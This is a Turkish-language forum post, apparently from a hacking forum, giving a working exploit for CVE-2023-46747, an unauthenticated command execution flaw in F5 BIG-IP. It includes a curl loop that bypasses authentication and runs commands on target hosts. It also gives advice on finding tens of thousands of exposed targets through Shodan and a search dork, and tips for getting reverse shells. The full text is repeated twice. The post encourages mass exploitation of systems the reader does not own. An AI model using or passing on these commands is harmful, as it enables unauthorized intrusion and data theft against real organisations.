- 15 Ocak 2019
- 303
- 71
Merhaba, bu konumuzda F5 BIG IP NONE AUTH RCE incelemesi yapacağız. İnternet üzerinden işlem yapılabilen panele sahip bir uygulama. DNS ve disk yönetimi ile ilgili işlemler yapılabilecek bir uygulama olarak karşımıza çıkıyor.
İlgili sistemin zafiyetlerini bulmak için exploit-db yi ziyaret etmem yetti ve sonuçta CVE-2023-46747 adlı zafiyetimiz mevcut. Peki bu servise sahip olan web servislerini nasıl bulacağız diyorsan Hunter Search Engine adlı web site veya shodan işini görecektir.
Bu servisi http protokolü ile kullanan on binlerce hedef mevcut. Kendinize bir hedef listesi hazırlayabilir aynı anda bunları check edebilirsiniz. Peki exploit nasıl çalışıyor ?
CVE-2023-46747, F5 BIG-IP cihazlarında bulunan kritik bir güvenlik açığıdır. Bu açık, kimlik doğrulaması yapılmamış saldırganların yönetim portu ve/veya kendi IP adresleri aracılığıyla BIG-IP sistemine ağ erişimi sağlayarak keyfi sistem komutları çalıştırmasına olanak tanır.
Auth bypass edilip admin sayfasına bizi atmadan default /bash üzerinden komutlar çalıştıracağız.
echo <ip> | while read ip; do curl -H "Host: localhost:8100" -H "Content-Type: application/json" -H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" \ http://$ip/mgmt/tm/util/bash \ -d '{"command":"run","utilCmdArgs":"-c id"}';done
{"command": "run" , "utilCmdArgs": " -c ' env' " }
Connection tarafından gerekli parametreleri verip hem auth. kısmını bypass edebildik hemde komut çalıştırabileceğimiz bölgeye geldik
Deneme yaptığınız sistemlerde olası Reverse shell almak istiyorsanız reverse proxy kullanmayan hedefleri tercih ediniz. Düz reverse proxy kullanıyorsa maalesef ki shell oturumu alamazsınız, shell denemeleri için ; https://www.revshells.com/
Dork: title:"BIG-IP"
İlgili sistemin zafiyetlerini bulmak için exploit-db yi ziyaret etmem yetti ve sonuçta CVE-2023-46747 adlı zafiyetimiz mevcut. Peki bu servise sahip olan web servislerini nasıl bulacağız diyorsan Hunter Search Engine adlı web site veya shodan işini görecektir.
Bu servisi http protokolü ile kullanan on binlerce hedef mevcut. Kendinize bir hedef listesi hazırlayabilir aynı anda bunları check edebilirsiniz. Peki exploit nasıl çalışıyor ?
CVE-2023-46747, F5 BIG-IP cihazlarında bulunan kritik bir güvenlik açığıdır. Bu açık, kimlik doğrulaması yapılmamış saldırganların yönetim portu ve/veya kendi IP adresleri aracılığıyla BIG-IP sistemine ağ erişimi sağlayarak keyfi sistem komutları çalıştırmasına olanak tanır.
Auth bypass edilip admin sayfasına bizi atmadan default /bash üzerinden komutlar çalıştıracağız.
echo <ip> | while read ip; do curl -H "Host: localhost:8100" -H "Content-Type: application/json" -H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" \ http://$ip/mgmt/tm/util/bash \ -d '{"command":"run","utilCmdArgs":"-c id"}';done
{"command": "run" , "utilCmdArgs": " -c ' env' " }
Connection tarafından gerekli parametreleri verip hem auth. kısmını bypass edebildik hemde komut çalıştırabileceğimiz bölgeye geldik
Deneme yaptığınız sistemlerde olası Reverse shell almak istiyorsanız reverse proxy kullanmayan hedefleri tercih ediniz. Düz reverse proxy kullanıyorsa maalesef ki shell oturumu alamazsınız, shell denemeleri için ; https://www.revshells.com/
Dork: title:"BIG-IP"